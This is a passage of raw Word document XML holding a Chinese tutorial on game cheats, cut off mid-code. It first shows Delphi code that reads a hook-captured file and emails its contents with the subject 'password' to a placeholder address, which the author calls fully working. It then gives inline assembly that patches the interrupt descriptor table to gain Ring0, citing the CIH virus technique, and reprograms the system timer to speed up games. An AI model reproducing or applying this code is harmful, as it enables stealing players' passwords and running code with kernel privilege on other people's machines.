        <w:t>hook.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个文本文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>reset(ReadFile); file://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设为读取方式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">try </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>While not Eof(ReadFile) do file://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当没有读到文件尾</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">begin </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Readln(ReadFile,s,j); file://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取文件行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">body:=body+s; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">end; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">finally </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>closefile(ReadFile); file://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">end; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nmsmtp1.EncodeType:=uuMime; file://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置编码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nmsmtp1.PostMessage.Attachments.Text:=&amp;#39;&amp;#39;; file://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置附件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nmsmtp1.PostMessage.FromAddress:=&amp;#39;XXX@XXX.com&amp;#39;; file://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置源邮件地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nmsmtp1.PostMessage.ToAddress.Text:=&amp;#39;XXX@XXX.com&amp;#39;; /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置目标邮件地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nmsmtp1.PostMessage.Body.Text:=&amp;#39;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&amp;#39;+&amp;#39; &amp;#39;+body; file://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置邮件内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nmsmtp1.PostMessage.Subject:=&amp;#39;password&amp;#39;; file://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置邮件标题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nmsmtp1.SendMail; file://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送邮件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　这个程序全部功能已经实现，编编试试。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　加速型外挂</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　原本我一直以为加速外挂是针对某个游戏而写的，后来发现我这种概念是不对的，所谓加速外挂其实是修改时钟频率达到加速的目的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　以前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时代玩过编程的人就会马上想到，这很简单嘛不就是直接修改一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8253</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>寄存器嘛，这在以前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时代可能可以行得通，但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则不然。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位的操作系统，并不是你想改哪就改哪的（微软的东东就是如此霸气，说不给你改就不给你改），但要改也不是不可能，我们可以通过两种方法来实现：第一是写一个硬件驱动来完成，第二是用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ring0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来实现（这种方法是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CIH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的作者陈盈豪首用的，它的原理是修改一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建一个中断门</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ring0-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用中断修改向量，但是没有办法只能用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ASM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>汇编来实现这一切</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*_*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，做为高级语言使用者惨啦！），用第一种方法用点麻烦，所以我们在这里就用第二种方法实现吧</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>~~~</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在实现之前我们来理一下思路吧：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、我们首先要写一个过程在这个过程里嵌入汇编语言来实现修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表、创建中断门，修改向量等工作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、调用这个过程来实现加速功能</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　好了，现在思路有了，我们就边看代码边讲解吧：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　首先我们建立一个过程，这个过程就是本程序的核心部份：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">procedure SetRing(value:word); stdcall; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">const ZDH = $03; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>／／</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设一个中断号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>var</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IDT : array [0..5] of byte; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>／／</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">OG : dword; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>／／存放旧向量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>begin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>asm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>push ebx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">sidt IDT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>／／读入中断描述符表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">mov ebx, dword ptr [IDT+2] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>／／</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表基地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">add ebx, 8*ZDH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>／／计算中断在中断描述符表中的位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">cli </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>／／关中断</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">mov dx, word ptr [ebx+6] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">shl edx, 16d </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">mov dx, word ptr [ebx] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">mov [OG], edx </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">mov eax, offset @@Ring0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>／／指向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ring0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>级代码段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">mov word ptr [ebx], ax </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>／／低</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1,2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>shr eax, 16d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">mov word ptr [ebx+6], ax </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>／／高</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位，保存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6,7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">int ZDH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>／／中断</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">mov ebx, dword ptr [IDT+2] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>／／重新定位</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>add ebx, 8*ZDH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>mov edx, [OG]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>mov word ptr [ebx], dx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>shr edx, 16d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">mov word ptr [ebx+6], dx </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>／／恢复被改了的向量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>pop ebx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">jmp @@exitasm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>／／到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exitasm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">@@Ring0: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>／／</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ring0,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个也是最最最核心的东东</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">mov al,$34 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>／／写入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8253</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制寄存器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>out $43,al</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mov ax,value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　／／写入定时值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">out $40,al </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>／／写定时值低位</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>mov al,ah</w:t>
      </w:r>
    </w:p>
